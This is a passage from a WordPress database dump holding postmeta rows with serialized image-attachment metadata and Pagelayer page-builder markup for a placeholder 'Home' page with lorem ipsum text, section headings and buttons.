medicine'),(140,38,'_wp_attached_file','2021/04/IMG_20200807_213425_333.jpg'),(141,38,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2448;s:6:\"height\";i:2448;s:4:\"file\";s:35:\"2021/04/IMG_20200807_213425_333.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"IMG_20200807_213425_333-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:37:\"IMG_20200807_213425_333-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:37:\"IMG_20200807_213425_333-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-small\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"clearwork-medium\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-large\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-940x940.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:940;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-thumb\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"alx-small\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"alx-medium\";a:4:{s:4:\"file\";s:35:\"IMG_20200807_213425_333-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(593,346,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:37:\"2021/08/IMG_20210701_202413_037-2.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:38:\"IMG_20210701_202413_037-2-1024x675.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(592,346,'_wp_attached_file','2021/08/IMG_20210701_202413_037-2.jpg'),(240,28,'_et_pb_use_builder','on'),(241,28,'_et_pb_show_page_creation','off'),(242,28,'_et_pb_old_content','<!-- wp:pagelayer/pl_post_props {\"post_title\":\"Home\",\"post_name\":\"home\",\"featured_image\":\"\",\"ele_bg_hover_delay\":\"400\",\"ele_css\":\"html{nscroll-behavior: smooth;n}\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"pagelayer-id\":\"q6w1628\"} /-->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"3ow4083\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"v3i9069\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003ch6u003eBest Touru003c/h6u003e\",\"pagelayer-id\":\"yxl7406\"} --><h6>Best Tour</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eRecentlyu003c/h5u003e\",\"pagelayer-id\":\"wr43667\"} --><h5>Recently</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch2u003eRecentlyu003c/h2u003e\",\"pagelayer-id\":\"rpu2866\"} --><h2>Recently</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"ftx2686\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"8iu8629\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"zce1846\"} -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"animation_delay\":\"600\",\"pagelayer-id\":\"95a4939\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"xg24789\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.u003c/pu003e\",\"pagelayer-id\":\"7q27715\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.u003c/pu003e\",\"pagelayer-id\":\"q7j7673\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"lud7614\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Read More\",\"align\":\"left\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"#efba6cff\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"1,1,1,1\",\"btn_bg_color\":\"\",\"btn_color\":\"#171615ff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"ele_margin_mobile\":\"0em,0em,2em,0em\",\"btn_bg_color_hover\":\"#efba6cff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#fbfbfbff\",\"pagelayer-id\":\"s4o7958\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"rj92421\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"8\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#0986c0\",\"ele_margin_tablet\":\"2em,0em,0em,0em\",\"text\":\"n\",\"pagelayer-id\":\"1l88886\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"zbd4245\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"5w53892\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003ch6u003eDiscover Storyu003c/h6u003e\",\"pagelayer-id\":\"s2y2854\"} --><h6>Discover Story</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eOur Storyu003c/h5u003e\",\"pagelayer-id\":\"7hj6278\"} --><h5>Our Story</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"heading_typo_tablet\":\",65,,,,,Solid,,,,\",\"text\":\"u003ch2u003eOur Storyu003c/h2u003e\",\"pagelayer-id\":\"8a83591\"} --><h2>Our Story</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"jbv5145\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"jwc6276\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"wx71564\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"13\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https://www.youtube.com/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_mobile\":\"0em,0em,3em,0em\",\"ele_margin_tablet\":\"0em,0em,3em,0em\",\"text\":\"n\",\"pagelayer-id\":\"fur4139\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"kex7064\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\" \",\"ele_bg_hover_delay\":\"400\",\"heading_typo\":\",19,,600,,,Solid,,Uppercase,,\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"u003ch5u003ePaul Volkmeru003c/h5u003e\",\"pagelayer-id\":\"xd56339\"} --><h5>Paul Volkmer</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch3u003eOwneru003c/h3u003e\",\"pagelayer-id\":\"41z4865\"} --><h3>Owner</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"erd9657\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"b606974\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.u003c/pu003e\",\"pagelayer-id\":\"gxr7585\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.u003c/pu003e\",\"pagelayer-id\":\"sgk9489\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"z8q5386\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Read More\",\"align\":\"left\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"#efba6cff\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"1,1,1,1\",\"btn_bg_color\":\"\",\"btn_color\":\"#171615ff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"ele_margin_mobile\":\"0em,0em,1em,0em\",\"btn_bg_color_hover\":\"#efba6cff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"kom4786\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"y9d5045\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"qyn8669\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003ch6u003eAboutu003c/h6u003e\",\"pagelayer-id\":\"zyg4311\"} --><h6>About</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eAboutu003c/h5u003e\",\"pagelayer-id\":\"5g46798\"} --><h5>About</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"u003ch2u003eAboutu003c/h2u003e\",\"pagelayer-id\":\"ad65610\"} --><h2>About</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet 